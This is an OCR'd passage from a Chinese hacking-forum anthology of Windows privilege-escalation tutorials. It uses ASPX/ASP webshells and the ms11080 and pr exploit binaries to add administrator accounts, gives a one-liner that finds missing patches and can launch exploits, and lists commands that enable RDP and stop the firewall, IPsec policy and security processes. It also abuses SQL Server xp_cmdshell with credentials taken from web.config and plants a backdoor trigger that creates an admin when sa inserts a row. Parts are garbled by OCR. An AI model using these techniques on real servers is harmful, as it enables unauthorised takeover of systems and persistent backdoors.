	服务器已经用下列角色进行了配置: 60日现在副务员		Internet Explorer 增强的安全配置	
进程数:47 CPU使用:6% 内存使用:227M / 1235M /	应用程序服务器提供构造、部署以及运行 XML Web 服务,	管理此应用程序服务器	请参阅(图)	
	Web CUMMERTANDY 和D.Comment/M20次用が扱いなイト。 20日 程序展る器技术包括 ASP.NET, COM+ 和 Internet 信息服 冬(IIS)。	 國談关于应用程序服务器的信息 前信息 请阅读有关 Web 服务器运程管理的 Web 界面的信息 	帮助和支持 Hicrosoft TechWet 部署和资源工具包 常见管理任务列表	J
		🥹 复查此角色的下一步	Windows Server 住区 新内容 战略性技术保护计划	
T				

以刚才添加账号的登陆进去了.

接下来演示一下 aspx 的 webshell 提权,当 asp 不支持 WScript.而支持 aspx 的脚本时候就可以试试用 aspx 来提权.

地址 @) 🙆 http://www.h4xOer.com/xg.aspx	
192.168.1.97:80(www.h4x0er.com)	
退出登录 文件(夹)管理 Cmd命令 IIS探测 系统进程 系统服务 用户(组)信息 系统信息 文件搜索 Serv-U	最权 注册表査询 端口扫描 数据库管理 端口映射
执行命令>>	
CmdB6径: ctwindowstsystem32tcmd.exe	
语句: fc Set 执行	
ALLUSERSFROFILE=C:\Documents and Settings\All Users AFP_POOL_ID=DefeailAppFool ClusterLog-C:WINDOWS\Cluster(cluster.log CommonFrogramFile=C:\Frogram Files\Common Files COMPUTENAME=MIXONEWLAFD62 ComSpec=C:\WINDOWS\ystem32\cnd.exe FF_MO_HOST_CHECK=N0 NUMBER_OF_FROCESSORS=4 05=Uindows_MT Path=C:WINDOWS\ystem32;C:\WINDOWS\System32\Wbem Path=C:WINDOWS\ystem32;C:\WINDOWS\System32\Wbem Path=C:WINDOWS\ystem32;C:\WINDOWS\System32\Wbem PATHECT=.OUT.FEFX.FAF7.CD:.VES;.VEE;.JS;.JSE;.WSF; PROCESSOR_IDEWTIFIFE*>06 Family 18 Model 1 Stepping 0, AuthenticAMD PROCESSOR_IEVEI-18 PROCESSOR_IEVEI-18 PROMPT=0F46 SystemProve: Sy	

Aspx webshell 是调用.net 的组件来运行 cmd 命令的.

File upload success!						
文件(失)管理 >>						
当育日录: CIRECYCLERI Go						
网站目录 木马目录 新捷目录 Removable(A:) 磁盘(C:) 磁盘(C:) 基础(E:) 本马目杀 C1Documents and Set 通販 上传						
文件(夹)名	最后修改时间	大小	操作			
Parent Directory						
S-1-5-21-3510027907-91576374-573660174-500	2012-06-15 12:36:51		删除丨重命名			
ms11080.exe	2012-06-15 02:53:11	168.08 K	下載 复制 编辑 重命名 修改文件属性			
🗖 pr.exe	2011-03-21 04:54:08	72.00 K	下载 复制 编辑 重命名 修改文件属性			
□ Delete selected 1 文件夹/ 2 文件						
Web ManAger						

打开 C:\RECYCLER\目录,点击文件管理,浏览 ms11080.exe,然后点击上传。

返回 File upload success!就说明上传成功了,0.0 我们看看该目录下是否存在 ms11080.exe 这个文件如 果不存在的话,很有可能是被杀毒软件杀掉了.

接下来切换到 cmd 命令去. 输入

/c C:\RECYCLER\ms11080.exe 当出现 Add to Administrators success

说明 90sec 这个账号添加成功了.账号密码都是 90sec.

192.168.1.97:80(www.h4x0er.com)	
退出登录 文件(夹)管理 Cmd命令 IIS探测 系统进程 系统服务 用户(组)信息 系统信息 文	件搜索 Serv-U提权 注册表查询 端口扫描 数据库管理 端口映射
执行命令>>	
Cmd路径:	
c:\windows\system32\cmd.exe	
语句: ic CIPECYCLEPIme11080.exe	执行
A CAREOTOELKANSTTOOD.EXE	
<pre>[>] msll-08 Exploit [>] by:Mer4en7y090sec.org [*] Token system command [*] command add user 90sec 90sec [*] User has been successfully added [*] Add to Administrators success</pre>	

我们运行 net user 看看是否添加上去了

Cmd路径: c:\windows\system32\cm	d.exe		
语句: /c net user			执行
\\MIXOXRN-A42FD62 AD	用户帐户		
90sec Guest SUPPORT 388945a0 命令成功完成。	Administrator IUSR_MIXOXRN-A42FD62 Xlaogual	ASPNET IWAM_MIXOXRN-A42FD62	
Web ManAger			

我们刚用 pr 和 ms11080 添加的账号都在。

Pr 和巴西烤肉的使用方法是一样的,ms11080 和 ms11046 使用方法也是一样的,下面就不演示了. 提权工具的方法也差不多,不懂的时候可以去 baidu 找一下...这里就不再登陆上去了.

<u> </u>		
地址	(D) Attp://www.h4x0er.com/	xg. aspx
192.	168.1.97:80(www.h4x0er.com)	
退出	登录 文件(夹)管理 Cmd命令	IIS探测 系统进程 系统服务 用户(组)信息 系统信息 文件搜索 Serv-U:
系	统信息 >>	
	• Server Domain :	www.h4x0er.com
	Server Ip :	192.168.1.97:80
	• Terminal Port :	3389
	Server OS :	Microsoft Windows NT 5.2.3790.0
	Server Software :	Microsoft-IIS/6.0
	 Server UserName : 	NETWORK SERVICE
	Server Time :	2012-6-15 23:43:52
	• Server TimeZone :	(GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
	Server BIOS :	Phoenix Technologies LTD : PhoenixBIOS 4.0 Release 6.0
	• CPU Count :	4
	CPU Version :	AMD Athlon(tm) II X4 631 Quad-Core Processor
	 Server upM : 	512.00 M
-		

Aspx 的 webshell 下点击系统信息,Terminal Port:即 3389 的端口,

或者在 aspx webshell 下的注册表查询

 $\label{eq:local_machine} HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber$

192.168.1.97:80(www.h4x0er.com)		Web Manager
退出登录 文件(夹)管理 Cmd命令 IIS探测 系统进程 系统服务 用户(组)信息 系统信息 文件搜	案 Serv-U提权 注册表查询 端口扫描 数据库管理 端口映射	Framework Ver : 1.1.4322.2379
注册表查询 >>		
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ControlTerminal Server\WinSta	ations/RDP-Tcp/	Ga
HKEY_LOCAL_MACHINE [HKEY_CLASSES_ROUT] HKEY_CORRENT_OSER] HKEY_OSERS [HKEY_	CORRENT_CONFIG	
Key	Value	
Parent Key		
UserOverride	<subkey></subkey>	
CfgDll	RDPCFGEX.DLL	
fEnableWinStation	1	
MaxInstanceCount	-1	
PdName	tcp	
PdClass	2	
PdDLL	tdtcp	
PdFlag	78	
OutBufLength	530	
OutBufCount	6	
OutBufDelay	100	
InteractiveDelay	50	
PortNumber	3389	

Aspxspy 还有一个反弹的 端口映射,--很卡..aspx 的 shell 因为是 user 权限,所以可以直接在 shell 里 反弹的。

0x03 附录

1.IIS6.0 下将 webshell 提升为 system 用户权限的方法:

进入应用程序池-属性-标识:

将标识里面的预定义账号设为:本地系统 (代表 webshell 具有 system 用户权限)

或者选用那个"IWAM_主机名"用户,再用 clone5.exe 程序克隆"IWAM_主机名"用户

2.提权漏洞的对应补丁号查询 cmd 版

自动检测补丁的 CMD 命令,命令比较简单,就不解释了,由于只有一行,所以直接复制到 cmd 中 就可以执行了,不需要保存为批处理文件......

提权漏洞的对应补丁号查询 cmd 版+加提权工具包:

你可以把"@echo %i Not Installed!" 换成 "%i.exe Parameters", 就可以自动提权了......

提权漏洞的对应补丁号查询 cmd 版+加提权工具包

systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find/i "%i"||@echo %i Not Installed!)&del /f/q/a a.txt

接下来内容由 90sec 的 0days 修正

这个版本是核老大写的...用的是 systeminfo 来看装了哪些补丁... 里面的补丁号已经更换过

 \vec{J} .systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644) do @type a.txt|@find/i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

这个是我按照他的命令修改的...是查看 c:\windows\下安装补丁之后留下的 log 文件来查看是否安装 了补丁...

dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt |@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

3.3389 连接不上的解决方法 如果直接连接连接不上的话,有可能是以下几种情况以及解决方法

1.远程桌面服务没开启

可以把

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 保存成 bat 文件在 cmd 下找个可写目录然后以 system 权限运行. 2.IP 策略阻拦 sc stop policyagent 3.windows 自带防火墙阻拦 net stop sharedaccess 4.其他防火墙阻拦 tasklist /svc 此命令可以获取每个进程中主持的服务 看到哪个不是系统自带的服务或者正在运行的进程 用 ntsd -c q -pn xxx.exe 和 net stop 还有 sc stop 这几个命令以 system 权限 xx 掉它. 5.内网 可以通过 lcx 等转发工具

第5节 Sql Server 提权

作者:小乖 邮箱:hx0c4k@gmail.com 来自:法客论坛-F4ckTeam 地址:http://team.f4ck.net

 0x00
 Sql Server 简介

 0x01
 用户权限介绍

 0x02
 Sa 用户提权

 0x03
 db_owner 提权

0x00 Sql Server 简介

SQL 是英文 Structured Query Language 的缩写,意思为结构化查询语言。SQL 语言的主要功能就是同各种数据库建立联系,进行沟通。按照 ANSI(美国国家标准协会)的规定,SQL 被作为关系型数据库管理系统的标准语言。

SQL Server 是由 Microsoft 开发和推广的关系数据库管理系统(DBMS),它最初是由 Microsoft、Sybase 和 Ashton-Tate 三家公司共同开发的,并于 1988 年推出了第一个 OS/2 版本。Microsoft SQL Server 近年来不断更新版本,1996 年, Microsoft 推出了 SQL Server 6.5 版本; 1998 年, SQL Server 7.0 版本和用户见面; SQL Server 2000 是 Microsoft 公司于 2000 年推出,目前最新版本是 2012 年 3 月份推出的 SQL SERVER 2012。

不知道大家以前或者现在有没有搞过端口抓鸡呢,1433 端口,如果弄过的童鞋一定很熟悉这个端口,其 实这个端口抓鸡的原理就是依靠 SQL Server 数据库的弱口令进行传马/执行 cmd 等一系列的入侵行 为--.其实 sql server 也可以叫mssql相信这个大家会更熟悉一些.下面我们就来介绍 Sql server 各个用 户里的权限.

0x01 用户权限介绍

Sa 可以执行 mssql 数据库的所有操作 db_owner 执行所有数据库角色活动 public 维护所有默认权限 db_accessadmin 添加和删除数据库用户, 组及角色 db_ddladmin 添加、更改或删除数据库对象 db_security admin 分配语句执行和对象权限 db_backupoperator 备份数据库 db_datareader 读取任何表中的数据 db_datawriter 添加、更改或删除所有表中的数据 db_denydatareader 不能读取任何表中的数据

在没降权的情况下,MSSQL 的服务是以 system 权限运行的.注意这一点很重要,如果 mssql 服务是以 users 组或者 guests 组降权运行的话,会导致下面一系列的操作进行不了.

MSSQL的数据库帐户权限类似WINDWOS(这里是类似.不是等于),简单来说可以分为SA,DB_OWNER,PCUBLIC等,SA 类似WINDWOS中的管理员,DB_OWNER类似WINDOWS中的Power Users.

Power Users 高级用户可以改变所有配置,执行所有程序,唯一就是不能把自己加进 administrators 组去. 但 mssql 里的 db_owner 显然没 windows 的 Power Users 那么可爱,他相对来说没那么大的权限,他不能执行程序.db_owner 能对 mssql 数据库进行任何操作.比如建一个表,或者建一个字段,删除那个表删除那个字段,包括修改插入,都是可以做到的.仅限于自己所管理的数据库之内,他只在自己所在的数据库之内,他就不能深入到系统里面,去执行系统的命令,当然他也不能执行程序.也就是说如果你的mssql 账号 dbowner 权限的话,你想上传个木马运行那是不现实的,PCUBLIC 相当于 users 用户,只能在指定的数据库内进行一些简单的操作,不能用于提权.

0x02 Sa 权限提权

在讲sa权限提权前我们先说说这个提权的前提一些重要点,第一mssql的服务没有降权,是以默认服务继承的权限来运行的.第二那就是找到 sa 的用户密码(你这不是废话么.小心我楼下丢你鸡蛋和臭菜 叶子!哎哟.砸中枪了).

0.0 先说说一般我是咋找的吧,在网站的目录下一般情况下,你是有可读可写的权限。 你可以尝试 找一下 asp 网站的话大概就 conn.asp(一般都放在这文件名的文件里,不过 asp 类型的网站很少有用到 mssql 的,现在一般用 asp 的网站都是一些小型网站.access 基本够了).如果是 aspx 类型的网站那就是 web.config 这个文件里了.一般数据库的数据库、账号、密码都是以明文保存的,当然也有一些不是以 明文保存是以一些 bin 目录里的加密的 base64 的加密函数保存,或者是以 hash 加密保存下来的 sa 密 码.这里不多做详细的解释.

hash 加密的参考 http://it.anhuinews.com/network/442646/391737177179.shtml Asp.net 解密反编译 http://gov.com.im/art_design/2011/1113/asp-net%E8%A7%A3%E5%AF%86.html

现在,我们开始,sa 提权之旅吧.

IP: 127.0.0.1	Port: 21,25,80,110,1433,1723,3306,3389,4899,5631,43958,6 Scan
127.0.0.1 : 21	
127.0.0.1 : 25	Close
127.0.0.1 : 80	Open
127.0.0.1 : 110	Close
127.0.0.1 : 1433	Close
127.0.0.1 : 1723	Close
127.0.0.1 : 3306	Close
127.0.0.1 : 3389	Close
127.0.0.1 : 4899	Close
127.0.0.1 : 5631	Close
127.0.0.1 : 43958	Close
127.0.0.1 : 65500	Close

Copyright © 2006-2009 X1 aoGuai's Blog All Rights Reserved.

先扫描一遍端口,mssql开启的服务端口是 1433..--我这里是 mssql2K 不知道为啥.搭建的 环境 1433 端口硬是没开..奇怪。-0-我这里大概说一下.

接下来在网站的目录下找 mssql 连接的字符串 <add key="ConnectionString" value="server=(local);uid=sa;pwd=sa;database=Northwind" />

Local 本地 ip Uid=账号 sa Pwd=密码 sa Database=数据库 Northwind

E:/www/Web.config	
a.loooo	
xml version="1.0" encoding="utf-8"?	
<configuration></configuration>	
<appsettings></appsettings>	
<add key="DatabaseType" value="SqlServer"></add>	
<add key="ConnectionString" value="server=</td><td></td></tr><tr><td>(local);uid=<mark>33</mark>;pwd=sa;database=Northwind"></add>	
<add key="DatabaseOwner" value="dbo"></add>	
<system.web></system.web>	
<httpruntime <="" executiontimeout="2000" maxrequestlength="10000000" td=""><td></td></httpruntime>	
useFullyQualifiedRedirectUrl="false" minFreeThreads="8" minLocalRequestFreeThreads="4"	
appRequestQueueLimit="100" enableVersionHeader="false" />	
<webservices></webservices>	
<pre><pre>cprotocols></pre></pre>	
<add name="HttpSoap"></add>	
<add name="HttpPost"></add>	
<add name="HttpGet"></add>	
<add name="Documentation"></add>	
<pre><nages <="" enablesessionstate="true" pre="" validatereguest="false"></nages></pre>	
enableViewState="true" />	Ĩ

在 aspxspy 下,我们连接上去提权.

法客论坛(F4ckTeam)	开站一周年提权文集
----------------	-----------

🚰 ASPX spy - Bicrosoft Internet Explorer		_ 8 ×
文件 (2) 编辑 (2) 查看 (Y) 收藏 (A) 工具 (2) 帮助 (A)		- 🥂
③ 后退 ◆ ② ▼ 图 ② ☆ 2 提案 ☆ 收藏夹 ④ ◎ ▼ ふ ■		
地址 @) 🙋 http://www.h4xOer.com/xg.aspx	🗾 🔁 转到	链接 »
127.0.0.1:80(www.h4x0er.com)	<u>小乖 QQ:54675</u> 5	5253 📥
Logout 文件管理器 执行命令 IIS侦探 进程 服务 用户信息 系统信息 文件搜索 SU Exp 注册表 端口 扫描 数据库 端口转发	Framework Ver : 4.0.301	28.1
数据库 >>		
ConnString : server=localhost;UID=sa;PWD=sa;database=Northwind;Provider=SQLOLEDB	MSSQL GO	
Copyright © 2006-2009 <u>X1aoGuai's Blog</u> All Rights Reserved.	MSSQL ACCESS	
		-
④ 完毕	🥑 Internet	
🦺 开始 🛛 🧃 🞯 👘 🖉 Inter 🔻 🗀 E: \www.root 🛛 💻 计算机管理 🛛 🔂 SQL Serv 🛛 👒 hosts -	🛛 🖕 🕡 🌭 🛼 🗖	21:19

server=localhost;UID=sa;PWD=sa;database=Northwind;Provider=SQLOLEDB Server 输入的是 ip 地址.

Uid 就是 mssql 的账号 pwd 就是 mssql 账号密码。这样看应该清晰了吧 0.0 在 go 的旁边的菜单栏点击一下,选择 mssql.再点击 go.

数据库 >>	2
ConnString : server=localhost;UID=sa;PWD=sa;database=Northwind;Provider=SQLOLEDB	[
MSSQL Version : Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2 NT 5.2 (Build 3790: Service Pack 2)	2000 Microsoft Corporation E
StvRoleMember : sa	
Please select a database : Select a DataBase 💌 SQLExec : XP_cmdshell exec Run SQL	•
Exec master.dbo.xp_cmdshell 'whoami'	
output	
nt authority/system	

登陆以后我们首先看看他是什么权限. Exec master.dbo.xp_cmdshell 'whoami' 返回 nt authority\system

太好了,没有降权-0-。System 权限在基础篇上讲过,是 windows 理论上最高权限的用户.

这可是比 administrator 还要高很多.由于 mssql默认安装下是继承系统的权限神马的.所以 他有了 system 这权限.

接下来我们执行创建账号密码的 mssql 语句吧

ConnString : server=localhost;UID=sa;PWD=sa;database=Northwind;Provider=SQLOLEDB	
MSSQL Version : Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright NT 5.2 (Build 3790: Service Pack 2)	(c) 1988-2000 Microsoft Corporation
SrvRoleMember : sa	
Please select a database : Select a DataBase 💌 SQLExec : XP_cmdshell exec Run SQL	×
Exec master.dbo.xp_cmdshell 'net user xiaoguai www.h4x0er.com /add' Exec master.dbo.xp_cmdshell 'net localgroup administrators xiaoguai /add'	
Query	
命令成功完成。	

Exec master.dbo.xp_cmdshell 'net user xiaoguai www.h4x0er.com /add' Exec master.dbo.xp_cmdshell 'net localgroup administrators xiaoguai /add'

添加账号 xiaoguai 密码 www.h4x0er.com

把 xiaoguai 添加到 administrators 这个用户组里(这里做个小提示,有些管理员为了恶心一下一些不咋懂用户组的小菜鸟,会把 guests 组改成 administrators 组来恶心人--,最好就是先确定管理员所在的组,然后再把你的用户添加进那个组里面.)

Exec master.dbo.xp_cmdshell''在这"俩个单引号里面可以执行 dos 命令.是以 system 权限 运行的.你可以把木马传上去,然后执行.

NF イレル 1 NY A2 1 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1	II GAGU
Run SQL	
Exec master.dbo.xp_cmdshell 'net user '	
Query	
output	
₩的用户帐户	
Administrator ASPNET Guest	
IUSR_MIX0XRN-A42FD62 IWAM_MIX0XRN-A42FD62 SUPPORT_388945a0	
xiaoguai	
命令运行完毕,但发生一个或多个错误。	

提示执行成功了我们接着

Exec master.dbo.xp_cmdshell 'net user '

0.0. 有 xiaoguai 这个账号了.

接着这里就不提供找端口的了. 一般都是 netstat - an 或者注册表神马的里面翻,上一节文章已经写了.

Asp 的大概演示一下

地址 @) 🍯 http://www.h4:	xOer.com/xg.asp			🔽 芛 转到
地址: E:\www.root				去吧 刷新
(1) [Program] (2) [Program [RECYCLER (d:\)] (10) [REC	mD】(3)【pcAnywhere】(4)【Document CYCLER(e:\)】	ts(5)【All_Users 】(6)【開	始_菜單】(7)【程_序】(8	B) RECYCLER (C: \)
→> 组件支持	Consul Ver	59	59	execute
→> 信息探针		14	24	
→> 查詢管理員	ver			
→> 端口掃描器				
→> 讀取註冊表	Microsoft Windows [版本 5.2.3790]			
→> Serv_u提權				
→> Serv_uFTP				
→ Sql命令 厦				
→ MS_sql提权 幕				
→> Radmin讀取 🏻 🏻 踊				
→> pcanywhere				
→> 文件夾打包				
→> 木马查找				

我的 asp 的 shell 里面有 sql 命令 第二个框是 mssql 账号 第三个框是 mssql 密码

Command 就是让你输入 dos 命令.然后他会执行的.

这里我就输入个 ver 做下演示.

Ms_sql提权这个 我这里也登陆不了.没1433 端口呃.. 大概就这样吧.和 aspx 的那个数据 库连接也差不多.

至于 mssql 提权时候遇到的一些错误要怎么修复.

我这里贴个文章吧.大家有兴趣,或者提权的时候遇到错误命令执行不了的时候就可以去 试试了.http://netsky-cheng.iteye.com/blog/1057315

0x03 db_owner 提权

这个方法比较另类,实现的过程也比较鸡肋..为了学习,我还是把方法提供出来吧.

Db_owner 可以执行所有数据库角色活动.

不能调用 xp_cmshell 的话我们就做一个触发器来触发达到提权的效果. 首先登陆..

ConnString: server=localhost;UID=xiaoguai;PWD=xiaoguai;database=master;Provider=SQLOLEDB	MSSQL 🔽 Go
MSSQL Version : Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Eu	ild 3790: Service Pack 2)
SrvRoleMember : db_owner	
Please select a database : Select a DataBase 💌 SQLExec : SQL Server Exec 💌	
Query	
Copyright@ 2006-2009 <u>X1aeGual's Blog</u> All Rights Reserved.	

是 db_owner 的权限..

我们在 db_wner 他所在管理的表里, 创建一个触发器,等管理员用 sa 用户去执行插入表 命令的时候会触发, 达到提权的效果。

我这里大概提供个思路吧.毕竟我也没成功利用过..

SrvRoleMember : db_owner			
Please select a database : test Run SQL		SQLExec : SQL S	erver Exec
Query			
TABLE_NAME	TABLE_TYPE	DATE_CREATED	DATE_MODIFIED
au_Comment	TABLE	2012-6-20 20:03:58	
au_Content	TABLE	2012-6-20 20:03:58	
bairong_Administrator	TABLE	2012-6-20 19:55:51	
pairong_AdministratorsInRoles	TABLE	2012-6-20 19:55:51	
airong_Cache	TABLE	2012-6-20 19:55:51	
pairong_Config	TABLE	2012-6-20 19:55:51	
airong_Count	TABLE	2012-6-20 19:55:51	
pairong_Digg	TABLE	2012-6-20 19:55:51	
pairong_IP2City	TABLE	2012-6-20 19:55:51	
pairong_Log	TABLE	2012-6-20 19:55:51	
pairong_Module	TABLE	2012-6-20 19:55:51	
airong_PermissionsInRoles	TABLE	2012-6-20 19:55:51	
pairong_Roles	TABLE	2012-6-20 19:55:51	
pairong_TableCollection	TABLE	2012-6-20 19:55:51	
pairong_TableMatch	TABLE	2012-6-20 19:55:51	
pairong_TableMetadata	TABLE	2012-6-20 19:55:51	
pairong_TableStyle	TABLE	2012-6-20 19:55:51	
bairong_TableStyleItem	TABLE	2012-6-20 19:55:51	

ど 完毕

这个 db_owner 用户可以管理 test 这个表.

我们就在这个表里找到会员的账号密码所在的表段名

	au_Content	TABLE	2012-6-20 20:03:58	
	bairong_Administrator	TABLE	2012-6-20 19:55:51	
	bairong_AdministratorsInRoles	TABLE	2012-6-20 19:55:51	
	bairong_Cache	TABLE	2012-6-20 19:55:51	
	bairong_Config	TABLE	2012-6-20 19:55:51	
	bairong_Count	TABLE	2012-6-20 19:55:51	
	bairong_Digg	TABLE	2012-6-20 19:55:51	
	bairong_IP2City	TABLE	2012-6-20 19:55:51	
	bairong_Log	TABLE	2012-6-20 19:55:51	
	bairong_Module	TABLE	2012-6-20 19:55:51	
	bairong_PermissionsInRoles	TABLE	2012-6-20 19:55:51	
	bairong_Roles	TABLE	2012-6-20 19:55:51	
	bairong_TableCollection	TABLE	2012-6-20 19:55:51	
	bairong_TableMatch	TABLE	2012-6-20 19:55:51	
	bairong_TableMetadata	TABLE	2012-6-20 19:55:51	
	bairong_TableStyle	TABLE	2012-6-20 19:55:51	
	bairong_TableStyleItem	TABLE	2012-6-20 19:55:51	
	bairong_TrackBack	TABLE	2012-6-20 19:55:51	
	bairong_UserConfig	TABLE	2012-6-20 19:55:51	
	bairong_UserCreditsLog	TABLE	2012-6-20 19:55:51	
	bairong_UserGroups	TABLE	2012-6-20 19:55:51	
	bairong_UserMessage	TABLE	2012-6-20 19:55:51	
	bairong_Users	TABLE	2012-6-20 19:55:51	
	bairong_UserType	TABLE	2012-6-20 19:55:51	
	bairong_Vote	TABLE	2012-6-20 19:55:51	
	bairong_VotelPAddress	TABLE	2012-6-20 19:55:51	
	bairong_VoteItem	TABLE	2012-6-20 19:55:51	
	siteserver Ad	TABLE	2012-6-20 19:55:52	

地址 @) 🙋 http://127.0.0.1/xg. aspx

大概就是这几个表里。

这里我们用 bairong_Users 来演示,我这里用 BSQL 来演示,其实和 aspxspy 也一样.也就是个执行的工具.

文件 編辑 报表 工具 帮助 **大**退出系统 <mark>Сс</mark> 17.77 断开 连接 语法检查 保存 导出 视图 添加 执行 新建 删除 查询 create TRIGGER TR_HACKER1 ON bairong_Users AFTER INSERT AS 连接 п÷х SA@. master model msdb Northwind wite BEGIN EXECUTE SP_ADDEXTENDEDEROC 'MASTER.DBO.XP_CMDBHELL','XF10670.DLL'--'XF50L70.DLL' EXECUTE MASTER.DBO.XP_CMDBHELL 'NET START TELMET' EXECUTE MASTER.DBO.XP_CMDBHELL 'NET start user xiaoguai ymmr.hdx0er.com /add' EXECUTE MASTER.DBO.XP_CMDBHELL 'net localgroup administrators xiaoguai /add' pubs tempdb end 对象浏览器 П÷х Transmission 0 <t TrackBac **▼** AFTER INSERT 🍖 SA@. as 🔒 master BEGIN 🔋 model EXECUTE SP_ADDEXTENDEDPROC 'MASTER.DBO.XP_CMDSHELL','XPLOG70.DLL'--'. EXECUTE MASTER.DBO.XP_CMDSHELL 'NET START TELNET' 🦲 msdb 🥛 Northwind EXECUTE MASTER.DBO.XP_CMDSHELL 'net user xiaoguai www.h4xDer.com /add 😑 pubs 'net localgroup administrators xiaogu EXECUTE MASTER.DBO.XP CMDSHELL empdb est 🔒 🏹 xiaoguai@. 象浏览器 o ę x 存储过程 函数 榠板 用户表 系统表 视图 E 🏥 bairong_TableStyleItem 🗄 🤠 bairong_TrackBack E 📅 bairong_UserConfig 🗄 🧱 bairong_UserCreditsLog

法客论坛(F4ckTeam)开站一周年提权文集

 用户表 系统表 视图

 ● 目 bairong_TrableStyleItem

 ● 目 bairong_UserConfig

 ● 目 bairong_UserGroups

 ● 目 bairong_UserS

 ● 目 bairong_UserS

 ● 目 bairong_UserS

 ● 目 bairong_UserType

 ● 目 bairong_Votel

 ● 目 bairong_Votel

执行完毕后,查看用户表.点击触发器会有 TR_hacker1 这个在.

create TRIGGER TR_HACKER1 ON bairong_Users AFTER INSERT AS BEGIN EXECUTE SP_ADDEXTENDEDPROC 'MASTER.DBO.XP_CMDSHELL','XPLOG70.DLL'--'XPSQL70.DLL' EXECUTE MASTER.DBO.XP_CMDSHELL 'NET START TELNET' EXECUTE MASTER.DBO.XP_CMDSHELL 'net user xiaoguai www.h4x0er.com /add'

EXECUTE MASTER.DBO.XP_CMDSHELL 'net localgroup administrators xiaoguai /add'

End

我来解释一下上面的 mssql 语句大概意思

就是创建一个名字叫 TR_HACKER1 的触发器在 bairong_User 表里,

然后等管理员执行这个表里相关的信息时候,就触发执行 mssql 的 xp_cmshell 里的特定 dos 命令.

我这里写的是 开启Telnet服务,创建账号 xiaoguai 密码……添加管理员.--如果怕不够保 险的话,就写多几句修复错误。这里不多说,抛砖引玉。。

我们来模拟管理员以 sa 登陆,然后维护的时候..

数据库类型 SQLServer ▼ 使用Windows身份验证 用户名 sa 密码 ** 服务器 . 数据库 test ▼	数据库类型 SQLServer ▼ 使用Windows身份验证 用户名 sa 密码 ** 服务器 . 数据库 test ▼ … 端口	数据库类型 SQLServer ▼ 使用Windows身份验证 用户名 sa 密码 *** 服务器 . 数据库 test ▼ … 端口
□ 使用Windows身份验证 用户名 sa 密码 ** 服务器 . 数据库 test	 使用Windows身份验证 用户名 sa 密码 *** 服务器 . 数据库 test 端口 	□ 使用Windows身份验证 用户名 sa 密码 ** 服务器 . 数据库 test
用户名 sa 密码 ** 服务器 . 数据库 test	用户名 sa 密码 ** 服务器 · 数据库 test	用户名 sa 密码 ** 服务器 . 数据库 test ▼ … 端口
密码 ** 服务器 . 数据库 test	 密码 *** 服务器 . 数据库 test 端口 	 密码 ** 服务器 . 数据库 test 端口
服务器 . 数据库 test	服务器 数据库 test	服务器 . 数据库 test
数据库 test	数据库 test	数据库 test
	端口	端口
端口		
□ 记住密码	□ 记住密码	□ 记住密码
·□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□		□ 记住密码
□ 记住密码		
1. 出住部時		

	VEE 330					<u> </u>			.X.IT	
连接	0.1	۹×	INSERT	INTO	bairong_Users(UserNam	e,Pass	word) VALUES('xiaoguai',	'11111')		
SA@ 										
対象対策器 子舗対程 函数 用 Patrong, IredBas 日 目 bairong, IredBas 日 日 bairong, IserCon 日 日 bairong, IserCon H H H H H H H H H H H H H H H H H H H	検技					Bsql	不能在事务内部执行过程'sp_uddexte 	X		
สายม										

INSERT INTO bairong_Users(UserName,Password) VALUES('xiaoguai','11111')

当管理员在 bairong_Users 这个表里插入

Username:xiaoguai

Password:11111

的时候,就会触发我们留下的后门。



看到了吧,xiaoguai账号已经创建成功.

Db_owner 用户提权的思路就是,把自己有权限管理的表里面,插一大堆后门触发器. 只要管理员以 sa 权限登录,想查一下日志或者插入语句的时候.就会触发我们的后门,达 到创建系统账号的效果.成功率比较低,效率也比较低...

第6节 Mysql 提权

作者:小乖 邮箱:hx0c4k@gmail.com 来自:法客论坛-F4ckTeam 地址:http://team.f4ck.net

0x00 简介
0x01 前言
0x02 手工提权,自动提权
0x03 启动项提权,DLL 劫持提权
0x04 mysql 降权提权

0x00 简介

MySQL 是一个中、小型关系型数据库管理系统,由瑞典 MySQL AB 公司开发,目前属于 Oracle 公司。MySQL 是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据 放在一个大仓库内,这样就增加了速度并提高了灵活性。MySQL 的 SQL 语言是用于访问数据库的 最常用标准化语言。MySQL 软件采用了 GPL (GNU 通用公共许可证),它分为免费版和商业版,由于其体积小、速度快、总体拥有成本低,尤其是开放源码这一特点,一般中小型网站的开发都选择 MySQL 作为网站数据库。由于其免费版的性能卓越,搭配 PHP 和 Apache 可组成良好的开发环境。

0x01 前言

利用 mysql提权的前提就是,服务器安装了 mysql,mysql的服务没有降权,(降权也可以提,没降权的话就最好了),是默认安装以系统权限继承的(system 权限).并且获得了 root 的账号密码.这里有一篇 mysql 权限的 http://www.176ku.com/wenzhai/ruqin/200909/11307.html 有兴趣的可以去了解了解.

